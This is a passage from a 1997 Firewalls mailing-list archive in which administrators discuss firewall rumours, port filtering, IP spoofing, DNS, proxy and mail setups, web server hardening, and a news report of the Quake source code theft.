Blowfish Open Architecture NetCrypto supports plug-in software modules from a variety of vendors, ensuring compatibility with future security technologies. Compatible with Non-Encrypted Systems NetCrypto is completely compatible with non-encrypted TCP/IP systems. When NetCrypto encounters a non-NetCrypto system at the other end of a network connection, it can, at your option, either connect in a standard non-encrypted fashion, or refuse the connection. Expandable Features NetCrypto currently encrypts all TCP network traffic, and down the road, you'll be able to add features such as authentication and filtering to the NetCrypto system, expanding it to fit your present and future needs. Anthony J. Commarata, CNE Sr. Network Engineer Jones, Day, Reavis & Pogue From firewalls-owner Fri Jan 10 16:17:23 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA27192 for firewalls-outgoing; Fri, 10 Jan 1997 14:59:06 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id OAA27170 for ; Fri, 10 Jan 1997 14:58:57 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id QAA26255; Fri, 10 Jan 1997 16:47:41 -0500 Date: Fri, 10 Jan 1997 16:47:37 -0500 (EST) From: Rabid Wombat To: Gabriel Dura cc: mike , firewalls@GreatCircle.COM Subject: Re: FW-1 hacked? - Reply In-Reply-To: <199701101620.IAA19160@geocities.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I could, if I were so inclined, tell you the names of many systems that are behind many types of firewalls. That does not mean that I got through the firewall to get that information - I may have worked on the system, the name of a system could have been included in a legitimate transmission, etc. Simply naming a system (especially when the existance of said system hasn't been verified) isn't "proof" in my book. I have worked on systems at govt. sites that are behind FW-1. I know the names of many of these systems. I could probably guess the names of others, just by following the naming conventions. This could be offered as "proof" that the firewall was compromised, even though it was not. My b.s. detector is going off. -r.w. On Fri, 10 Jan 1997, Gabriel Dura wrote: > > There is a guy, working on his own, who claims he knows how to penetrate > FBI's firewall. > As a proof I was told that behind the firewall there is there is another > computer 'phi.fbi.gov'. > > > In the case of me being correctly informed and FBI is using FW-1 you have > an answer. > > > Hope it helps, > Gabriel Dura > dura@geocities.com > > > P.S. I can not guarantee the accuracy of this information and I can not > reveal the person who told me. > > > > ---------- > > From: mike > > To: firewalls@GreatCircle.COM > > Subject: FW-1 hacked? > > Date: miercuri, ianuarie 08, 1997 16:27 > > > > > Hi all > > Does anyone know if FW-1 was ever hacked? > > From firewalls-owner Fri Jan 10 16:40:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA27645 for firewalls-outgoing; Fri, 10 Jan 1997 15:04:58 -0800 (PST) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA27617 for ; Fri, 10 Jan 1997 15:04:47 -0800 (PST) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id PAA27889 for ; Fri, 10 Jan 1997 15:06:52 -0800 (PST) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA10054; Fri, 10 Jan 97 15:04:33 PST Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id PAA06694 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Fri, 10 Jan 1997 15:04:25 -0800 (PST) Message-Id: <199701102304.PAA06694@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id C34422A51408D8AA8825641B007ECCDB; Fri, 10 Jan 97 15:04:24 EDT To: Dave Wreski Cc: firewalls From: Ryan Russell/SYBASE Date: 10 Jan 97 15:09:03 EDT Subject: Re: Restricting port access X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If you want to allow all services between those machines, and you are not worried about IP spoofing, then that's all you need. If you only want the IP addresses to have access to certain services (say, WWW and FTP) then the problems with allowing everything should be obvious. IP spoofing is still a problem. It's really a matter of a trust relationship. Generally, it's best to have the minimum amount of trust you need to get the job done. Ryan ---------- Previous Message ---------- To: firewalls cc: From: tel1dvw @ is.ups.com (Dave Wreski) @ smtp Date: 01/10/97 03:08:25 PM Subject: Restricting port access I understand it is important to explicitly define which ports are acceptable in a firewall, but I don't understand why. If I have source and destination IP's defined, does it really make that much difference? Thanks, Dave Wreski ----------------------------------------------------------------------- "The opinions expressed here are my own and do not represent the views or opinions of United Parcel Service, Inc." ----------------------------------------------------------------------- echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc From firewalls-owner Fri Jan 10 17:08:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA03429 for firewalls-outgoing; Fri, 10 Jan 1997 16:21:55 -0800 (PST) Received: from trem.cnt.org.br (desvio.cnt.org.br [200.19.123.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA03403 for ; Fri, 10 Jan 1997 16:21:35 -0800 (PST) Received: by trem.cnt.org.br (AIX 3.2/UCB 5.64/4.03) id AA02736; Fri, 10 Jan 1997 22:15:16 -0300 From: ormonde@trem.cnt.org.br (Rodrigo Ormonde) Message-Id: <9701110115.AA02736@trem.cnt.org.br> Subject: Re: Restricting port access To: tel1dvw@is.ups.com (Dave Wreski) Date: Fri, 10 Jan 1997 22:15:16 -0300 (GRNLNDST) Cc: firewalls@greatcircle.com In-Reply-To: from "Dave Wreski" at Jan 10, 97 03:08:25 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I understand it is important to explicitly define which ports are > acceptable in a firewall, but I don't understand why. If I have source > and destination IP's defined, does it really make that much difference? > > Thanks, > Dave Wreski Yes, unless you want the remote IPs to be able to access all your services. I'm sure you have some services that you don't want anybody outside your network using: NFS, NIS, etc. Another point is that if someone attacks you via IP spoofing, he will be able to access all the services running on your machine. -- Rodrigo de La Rocque Ormonde e-mail: ormonde@cnt.org.br PGP Public key: finger ormonde@cnt.org.br From firewalls-owner Fri Jan 10 17:14:28 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA05855 for firewalls-outgoing; Fri, 10 Jan 1997 16:51:29 -0800 (PST) Received: from us.net (laurel.us.net [198.240.72.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA05792 for ; Fri, 10 Jan 1997 16:51:13 -0800 (PST) Received: from rmcm001.us.net (enda02.usnet.us.net [198.240.65.10]) by us.net (8.6.5/8.6.12) with SMTP id TAA12631; Fri, 10 Jan 1997 19:01:25 -0500 X-Provider: US Net - Advanced Internet Services - (301) 572-5926 - info@us.net Message-ID: <387A735A.2C77@mailhost.net> Date: Mon, 10 Jan 2000 19:03:38 -0500 From: "R. McMahon" X-Mailer: Mozilla 3.0 (Win95; I) MIME-Version: 1.0 To: mahesh.ravji@wang.co.nz CC: firewalls@greatcircle.com Subject: Reference: DNS forwarding to firewall Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have had a similar problem except I use Solaris 2.4. The problem concerns you having a root name server and a forwarder on the same server. When you have a root name server, the server will not forward to another host. What I did was to add all the 2.4 patches in the Recommended Group. I then created a top-level domain name server whose "named.ca" file had the top-level domain name server instead of a root name server in it. (Without these patches you can only have a root name server in the cache file.) hope this helps rm From firewalls-owner Fri Jan 10 17:14:44 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA06237 for firewalls-outgoing; Fri, 10 Jan 1997 16:56:44 -0800 (PST) Received: from sa.infonet.com (sa.infonet.com [192.157.130.21]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id QAA06203 for ; Fri, 10 Jan 1997 16:56:31 -0800 (PST) Received: (from m400@localhost) by sa.infonet.com (8.6.12/8.6.9) id RAA02743; Fri, 10 Jan 1997 17:57:41 GMT Date: 10 Jan 97 11:40 GMT X400-Trace: us*infonet*slchicago; Arrival 10 Jan 97 11:40 GMT Action: Relayed X400-Trace: us*infonet*ccmail88; Arrival 10 Jan 97 11:40 GMT Action: Relayed X400-Trace: us*infonet*; Arrival 10 Jan 97 17:57 GMT Action: Relayed P1-Message-ID: us*infonet*slchicago;0852919049/1246274237/1 Original-Encoded-Information-Types: IA5-Text P1-Recipients: firewalls@GreatCircle.COM,Robin.Pollard@mail.ing.nl From: Ralph Docken To: firewalls@GreatCircle.COM, Robin.Pollard@mail.ing.nl Message-ID: <@x400gw.infonet.com> Subject: cc:Mail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Robin: Our Internet Provider is INFONET out of California. They have a major proprietary network across USA and Europe, with lesser but growing penetration into Pacific Rim and South America. One of their add-on services is Notice Exchange. Remote users can link to Notice Exchange via any Internet connection or by dialing one of Infonet's local POP's. cc:Mail is store-and-forwarded in a sufficiently secure (for us anyway) manner and lands in your Post Office (the perimeter one), then you cc:Mail-Gateway it through your firewall into your internal Post Office. Notice Exchange also exchanges cc:Mail formats with all X.400 formats (MCI, AT&T, MSE, lots) and handles text and binary attachments very well, eliminating most instances of uuencode/uudecode etc. We USE Infonet's Notice Exchange, have for a few years, and like it a lot. I do NOT work for the firm--never have. They don't pay me anything to say I like them. ______________________________ Reply Separator _________________________________ Subject: None Author: firewalls-owner@GreatCircle.COM at nxinternet Date: 1/10/97 6:37 AM Message-ID: <0aebc6ee839d9c87@deliver.cichlid.com> Lines: 49 Approved: deliver@cichlid.com Xdeliver: processed on Fri Jan 10 06:37:21 PST 1997 Xdeliver: SENDER firewalls-owner@greatcircle.com Xdeliver: to Xdeliver: cc Xdeliver: apparent_to Xdeliver: from robin.pollard@mail.ing.nl X400-Originator: Robin.Pollard@mail.ing.nl X400-Recipients: firewalls@greatcircle.com X400-Mts-Identifier: [/PRMD=ING GROEP/ADMD=400NET/C=NL/;0013700002238963000002] X400-Content-Type: P2-1988 (22) Message-Id: <0013700002238963000002*@MHS> To: firewalls Subject: A simple firewall requirement ? Date: Fri, 10 Jan 1997 15:04:59 +0000 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking at ways to provide global access to our internal mail system (cc:Mail) for mobile users. We have cc:Mail "post offices" where user mail is stored at various offices throughout the globe, all linked to a central hub here via our own VPN (TCP/IP). The remote users need to be able to make a (TCP/IP) connection from their laptop into the VPN and down to their PO to get mail. We have access to X28 access points in most of the world. I was thinking of a PPP dialup machine here, (accessed via X28), that will route packets from a limited number of IP addresses (The mobile users) to the IP addresses of the mail PO's only on the port cc:Mail uses (cc0) all else is of course excluded. Lotus claim cc:Mail sends all it's traffic well encrypted but keep the algorithm secret :) we trust the network provider enough to be happy with this. What sort of hardware can do this, will a single box Linux solution do or can it not filter in that detail ? The PPP point is exposed to the world (or anyone who hacks our network provider) what attacks is it open to? Should the PPP box sit outside another filtering router incase it is compromised or can it be locked down tight with such limited requirements. Any big holes I should be aware of ? TIA, Robin Pollard Infrastructure Support ING Bank International robin.pollard@mail.ing.nl From firewalls-owner Fri Jan 10 18:59:54 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA19037 for firewalls-outgoing; Fri, 10 Jan 1997 18:49:06 -0800 (PST) Received: from tor-srs1.netcom.ca (tor-srs1.netcom.ca [207.93.1.148]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA19007 for ; Fri, 10 Jan 1997 18:48:51 -0800 (PST) Received: from gmorell.lanacom.com by tor-srs1.netcom.ca (8.7.5/SMI-4.1/Netcom) id VAA02773; Fri, 10 Jan 1997 21:48:18 -0500 (EST) Received: by gmorell.lanacom.com with Microsoft Mail id <01BBFF3F.F404D300@gmorell.lanacom.com>; Fri, 10 Jan 1997 21:48:02 -0500 Message-ID: <01BBFF3F.F404D300@gmorell.lanacom.com> From: Glenn Morell To: "'Firewalls@GreatCircle.COM'" Subject: HTTP replies through firewalls Date: Fri, 10 Jan 1997 21:47:56 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm having trouble sending a pretty standard HTTP reply through a number = of firewalls...unfortunately the users I've been dealing with don't know = what firewall they are using so I'm having trouble narrowing it down to = a particular one. =20 Here's what happening: My server receives standard HTTP 1.0 requests = and replies back with HTML. The problem is that the reply doesn't make = it back through all types of firewalls and/or proxy servers. Half the = firewalls seem to choke whenever I send back the standard HTTP headers = (ie HTTP status line followed by "Date: ", "Server: ", "Content-Type:" = and "Content-Length:") while the other half choke if the headers are = not there (ie they will accept the raw HTML reply) =20 Some of the proxies/firewalls simply fail with a HTTP 500 error while = others echo the request (truncated) back to the sender (ie if the client = posts "test" (ignoring the HTTP headers) and the server replies with = "0123456789" the client receives back "test012345" which is the proper = length, but for some reason it includes the posted data) If you have any insight then please let me know ASAP...thanks in = advance. Glenn Morell=09 gmorell@netcom.ca From firewalls-owner Fri Jan 10 20:15:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA26295 for firewalls-outgoing; Fri, 10 Jan 1997 19:43:26 -0800 (PST) Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA26274 for ; Fri, 10 Jan 1997 19:43:16 -0800 (PST) Received: from explorer2.clark.net (sans@explorer2.clark.net [168.143.0.5]) by mail.clark.net (8.7.3/8.6.5) with ESMTP id WAA04493 for ; Fri, 10 Jan 1997 22:42:17 -0500 (EST) Received: from localhost (sans@localhost) by explorer2.clark.net (8.8.4/8.7.1) with SMTP id WAA02036 for ; Fri, 10 Jan 1997 22:43:02 -0500 (EST) X-Authentication-Warning: explorer2.clark.net: sans owned process doing -bs Date: Fri, 10 Jan 1997 22:43:02 -0500 (EST) From: "SANS'96 Conference Office" To: firewalls@greatcircle.com Subject: Super smart security watchers? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can someone recommend people who would do a great job on monitoring any one or more of the following areas as a (paid) security watcher? Cryptography and cryptography standardization JAVA security Denial of Service attacks Web Server security Legal changes Firewalls Cyber-terrorism Solaris security AIX security Windows/NT security PC viruses MVS security SGI security HP-UX security Linux security BSDI security We are looking for people who notice the important developments and don't get caught up in trivia. The successful candidates will provide initial submissions for the editors (Matt Bishop, Michele Crabb, Gene Schultz, Marcus Ranum, and Rob Kolstad) of the new network security digest that is distributed to people who have attended SANS and Network Security Conferences. The hard part of the job is writing briefly. Each monthly issue takes less than 3 minutes to read. Here is the table of contents of the January 97 issue. Each item includes the problem and the solution (if one has been found). 1. SGI's Factory Installed OutofBox software and systour demos pose security risk. 2. The hoax that won't go away. Tell your users where to find the latest information about hoaxes. 3. Yet another security hole in BSD based lpr (including Linux, AIX, FreeBSD). Local users can exploit this to get root access. 4. 65 FAQS on World-Wide-Web Security Issues. Example: What CGI scripts are known to contain security holes? 5. Graphical Tools to evaluate security log files 6. HP security risk: Remote Watch. 7. System crashing? Large ping data packets can crash or freeze some hosts. 8. The Microsoft Word Virus: The macro virus spreads and can infect Excel too. Thanks in advance for your suggestions. Alan Paller SANS Coordinator BTW: If you are attending SANS this year, try to catch the Security War Games course that Matt Bishop and Alex Yuriev are creating. They will be simulating a series of intrusions and how to defend against them. From firewalls-owner Sat Jan 11 01:29:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA10756 for firewalls-outgoing; Sat, 11 Jan 1997 01:18:04 -0800 (PST) Received: from garanti1.garanti.com.tr ([194.54.51.100]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA10742 for ; Sat, 11 Jan 1997 01:17:51 -0800 (PST) Received: from Mailhub by garanti1.garanti.com.tr id AA06336; Sat, 11 Jan 1997 11:18:17 +0300 Received: from GarantiUser by GarantiMailServer id AA22584; Sat, 11 Jan 1997 11:16:07 +0300 Received: by SMTPGW.FW.GARANTI.COM.TR with Microsoft Mail id <32D7E6D1@SMTPGW.FW.GARANTI.COM.TR>; Sat, 11 Jan 97 11:15:29 PST From: "Cihan Subasi (Garanti Tic)" To: "Cihan Subasi (Garanti Tic)" , firewall , Mike Papais Subject: Re: RealAudio clients behind the FW... Date: Sat, 11 Jan 97 11:14:00 PST Message-Id: <32D7E6D1@SMTPGW.FW.GARANTI.COM.TR> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk But I'm running SOCKS PROXY on the FW and seems like I cant set SOCKS host on the RA client.... ---------------------------------------------------------------------------- -- Set it to TCP. At 03:32 PM 1/10/97 PST, you wrote: > > > I'm having problems configuring FW to allow RealAudio packets...Port >7070 seems open but data transmission on a UDP port do not occur...Please >help.... > > Thanks > Cihan > > Mike Papais mjp2@chrysler.com Chrysler Corporation 810-497-1193 (tie 897) From firewalls-owner Sat Jan 11 02:14:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA13517 for firewalls-outgoing; Sat, 11 Jan 1997 02:05:41 -0800 (PST) Received: from pino.demon.nl (pino.demon.nl [194.159.226.41]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id CAA13510 for ; Sat, 11 Jan 1997 02:05:27 -0800 (PST) Received: from localhost (arjan@localhost) by pino.demon.nl (8.8.4/8.8.4) with SMTP id LAA00564; Sat, 11 Jan 1997 11:04:55 +0100 Date: Sat, 11 Jan 1997 11:04:54 +0100 (MET) From: Arjan Vos To: alex@usanetworks.com cc: firewalls@greatcircle.com Subject: Re: Rom based os/web server? In-Reply-To: <2.2.32.19970109161037.00bf5620@icarus.usanetworks.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I believe it's only the kernel that's rom-based and uncompressed in ram. What might be possible is to burn as cd-rom with a live file-system of Linux or FreeBSD or whatever. Startup from the cdrom and mount a partition on a hard drive just for read-write files such as log-files etc. (e.g. /var file system). But this will bring us into the rom-based web server discussion. Arjan Vos -- Eat hard Sleep hard Wear glasses if you need them On Thu, 9 Jan 1997, Alexey Zilber wrote: > I recieved the previous months copy of The Linux Journal (yes, yes, I know.. > :-) ). And it talks about a rom based stripped down version of Linux that's > been created, for systems that cannot use components that could be damaged > from stress (like hardrives). This thing is stored, compressed in rom, then > gets booted and uncompressed into ram. > This thing might be good for a hard-coded webserver. While it could > get hacked, a reboot and a password change should be all that's needed to > repair it. > Alex > > From firewalls-owner Sat Jan 11 06:44:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA20642 for firewalls-outgoing; Sat, 11 Jan 1997 06:25:20 -0800 (PST) Received: from alpha01.community.net.uk (alpha01.community.net.uk [194.176.76.16]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA20635 for ; Sat, 11 Jan 1997 06:25:13 -0800 (PST) Received: from mistica.connessione ([151.99.186.136]) by alpha01.community.net.uk (8.8.2/8.8.2) with SMTP id OAA01699 for ; Sat, 11 Jan 1997 14:24:49 GMT Message-Id: <1.5.4.32.19970111142039.00698bf8@pop.community.co.uk> X-Sender: paranoia@pop.community.co.uk X-Mailer: Windows Eudora Light Version 1.5.4 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 11 Jan 1997 15:20:39 +0100 To: firewalls@GreatCircle.COM From: Paranoia Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Pleaze.... remove my address from the mailing list.... 10x... paranoia@community.co.uk From firewalls-owner Sat Jan 11 07:14:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA22026 for firewalls-outgoing; Sat, 11 Jan 1997 07:06:10 -0800 (PST) Received: from nebula.online.ee (nebula.online.ee [194.106.96.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA22011 for ; Sat, 11 Jan 1997 07:06:00 -0800 (PST) Received: from localhost (jk@localhost) by nebula.online.ee (8.8.3/8.8.3) with SMTP id RAA26710; Sat, 11 Jan 1997 17:05:40 +0200 (EET) Date: Sat, 11 Jan 1997 17:05:38 +0200 (EET) From: Jyri Kaljundi X-Sender: jk@nebula Reply-To: Jyri Kaljundi To: Firewalls@GreatCircle.COM cc: gunni@if.is Subject: Re: TCP/IP encrypted connection In-Reply-To: <199701102149.NAA16346@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk gunni@if.is (Gunnar Ingvi Thorisson) asked: > I'm looking for a good way to transfer TCP/IP data between two Networks > (two countries) safe and secure ower the Internet. Maybe a router which > is cabable of crypting outgoing packets addressed to certain networks? Most of the routers and firewalls you can get in Europe have only weak encryption, so these should never be used. I suggest you have a look at the F-Secure product family. F-Secure SSH is one of the most popular (and strongest) TCP encryption products available in Europe. For encrypting traffic between 2 (or even more) LAN's there is a product called F-Secure VPN. This software runs on ordinary PC with 2 Ethernet cards and encrypts all the traffic between the sites you choose. DataComm Magazine gave a nice review of the product in their January issue, which is available at: http://www.data.com/hot_products/software_security/fellows.html More information can be found at: http://www.Europe.DataFellows.com/f-secure/vpn/ Juri Kaljundi jk@stallion.ee From firewalls-owner Sat Jan 11 07:44:35 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA23450 for firewalls-outgoing; Sat, 11 Jan 1997 07:32:25 -0800 (PST) Received: from nebula.online.ee (nebula.online.ee [194.106.96.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA23443 for ; Sat, 11 Jan 1997 07:32:17 -0800 (PST) Received: from localhost (jk@localhost) by nebula.online.ee (8.8.3/8.8.3) with SMTP id RAA27152 for ; Sat, 11 Jan 1997 17:32:01 +0200 (EET) Date: Sat, 11 Jan 1997 17:32:00 +0200 (EET) From: Jyri Kaljundi X-Sender: jk@nebula To: Firewalls@GreatCircle.COM Subject: Re: FW-1 hacked? In-Reply-To: <199701090206.SAA09654@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mike wrote: > Does anyone know if FW-1 was ever hacked? There were some stupid rumors about FW-1 being breaked into on some newsgroups (alt.hackers.malicious I think) some time ago. What actually happened was not Firewall-1 being broken into, someone just got access to a badly configured FW-1 and got the output of the fwinfo command. No hacking. No source code breaking. When you allow all the traffic into your firewall, it does not get hacked. You just allow access into it :) 90% of the problems with firewalls is misconfiguration. Firewall-1 software is used at so many sites with very strong security, that it probably is one of the best solution for a secure firewall. Juri Kaljundi jk@stallion.ee From firewalls-owner Sat Jan 11 07:59:27 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA23166 for firewalls-outgoing; Sat, 11 Jan 1997 07:23:36 -0800 (PST) Received: from nebula.online.ee (nebula.online.ee [194.106.96.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA23130 for ; Sat, 11 Jan 1997 07:23:17 -0800 (PST) Received: from localhost (jk@localhost) by nebula.online.ee (8.8.3/8.8.3) with SMTP id RAA27107 for ; Sat, 11 Jan 1997 17:22:58 +0200 (EET) Date: Sat, 11 Jan 1997 17:22:57 +0200 (EET) From: Jyri Kaljundi X-Sender: jk@nebula To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V6 #14 In-Reply-To: <199701110901.BAA09682@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk John Cross wrote: > I'm currently trying to find a replacement for our TIS firewall running > on a BSD box. I've asked for product info on the following: > Guardian > OnGuard > CheckPoint > Eagle NT > I'm planning on running the system on an NT pentium box. A nice review was done by LAN Magazine in December, have a look at http://www.lanmag.com/9612fire.htm They reviewed Borderware, Gauntlet, Check Point Firewall-1, Eagle NT and some others, of which Firewall-1 and Eagle NT were Windows NT versions. The summary said: "Firewall-1 had the best Windows GUI, help system, and breadth of platform support. Although we have origins in DOS, Windows, Unix, and other operating systems, we forced ourselves to pick a winner if money was no object, if speed and installation ease were important, and if breadth of PC platform support was paramount. And the winner is: Firewall-1 (but it was a tough decision)." Juri Kaljundi jk@stallion.ee From firewalls-owner Sat Jan 11 09:18:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA28879 for firewalls-outgoing; Sat, 11 Jan 1997 09:01:10 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA28872 for ; Sat, 11 Jan 1997 09:01:02 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id LAA05474; Sat, 11 Jan 1997 11:57:44 -0500 From: Adam Shostack Message-Id: <199701111657.LAA05474@homeport.org> Subject: Re: Newbie Q's & Class 3 Firewalls? In-Reply-To: <1.5.4.32.19970110203635.006a5348@grtk.com> from John Cross at "Jan 10, 97 03:36:35 pm" To: jcross@grtk.com (John Cross) Date: Sat, 11 Jan 1997 11:57:44 -0500 (EST) Cc: firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk John Cross wrote: | Couple of questions: | 1. I've had a couple of those sales types banter around the term 'Class 3' | firewall, what are they talking about? I think Class 1 is just packet | filtering, Class 2 is proxy service, but don't quite understand Class 3. Class 3 is whatever the sales guy was selling. May be smart packet filters, or transparent application proxies. | 3. Does the webserver belong in the DMZ? I've noticed in a lot of the | reading that the webserver is usually stuck outside the firewall, why is | this? Is the sacrificial lamb or does it just pose too many problems | bringing it on the inside? Any tips for securing it if its stuck out in the | DMZ? Most importantly, can the Webserver run on the same box as the | firewall or is this a bad idea? Web servers should usually be outside your network because they tend to be very vulnerable to misconfiguration, buffer overflows, and other mistakes. To secure your web server, run only the code & features you need, run them as unprivledged users, run chrooted, run on a bastion host. Also, review your cgis for problems. Common cgi problems mostly fall under the 'foolishly acting on user input,' category--allowing a user to stuff a buffer so the stack is corrupted; taking user input and passing it to system() or exec(); or otherwise accepting what the evil user wants you to do. If you consider it likely that your web server will be broken into, do you think its a good idea to expose your firewall to that risk? Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Sat Jan 11 10:44:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA02199 for firewalls-outgoing; Sat, 11 Jan 1997 10:35:35 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA02192 for ; Sat, 11 Jan 1997 10:35:24 -0800 (PST) Received: from big-dogs.cisco.com (c1robo13.cisco.com [171.68.13.13]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id KAA01250 for ; Sat, 11 Jan 1997 10:35:11 -0800 (PST) Message-Id: <3.0.32.19970111133508.00699150@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sat, 11 Jan 1997 13:35:11 -0500 To: Firewalls Mailing List From: Paul Ferguson Subject: [fwd] Hackers Hack Crack, Steal Quake Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- FYI. ref: http://www.wired.com/news/culture/story/1418.html [snip] Hackers Hack Crack, Steal Quake by Annaliza Savage=20 8:00 pm PST - Hackers broke into the Web server and file server of Crack dot Com, a Texas gaming company, on Wednesday, stealing the source code for id's Quake 1.01, as well as Crack's newest project, Golgatha, and older games Abuse and Mac Abuse. Although the hackers left a trail that may make them easy to track, the theft did its damage. "Quake's raw engine market value dropped several hundred thousand dollars," said Dave Taylor, who formed Crack dot Com after leaving id Software, where he worked on Doom and Quake. But Barrett Alexander of id denies that the financial loss will be so great, saying that the code for Quake's unique engine is recognizable, making it hard for anyone to be able to use without id's knowledge. Crack dot Com is also worried that its unreleased techniques, developed for Golgotha, could make their way into the hands of other game competitors, who could copy bits of code into their own software. The hackers, who were able to get through the Crack's firewall, left intact a bash-history file that recorded all their movements. They even logged onto IRC's #quake to brag about their exploits, and made Quake's source available on Crack dot Com's homepage (it is no longer there). The hackers, who identified themselves as being from the group FEH, probably broke through Crack's firewall through their Web site. The former editor of the now defunct hacker magazine FEH denies any knowledge of the event, and has already posted a disclaimer. Copyright =A9 1993-97 Wired Ventures, Inc. and affiliated companies. All rights reserved. [snip] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMtfdSJRLcZSdHMBNAQE/CAQAhfXuhlgBDClq7P/RJ7CWont0nWX5VUwo QhAPvpAo71AHc2KgbGarQ+I0ac83xFqpCmYnQkiyiJ6Z7Xn4ByJB553bJYn9mJOd 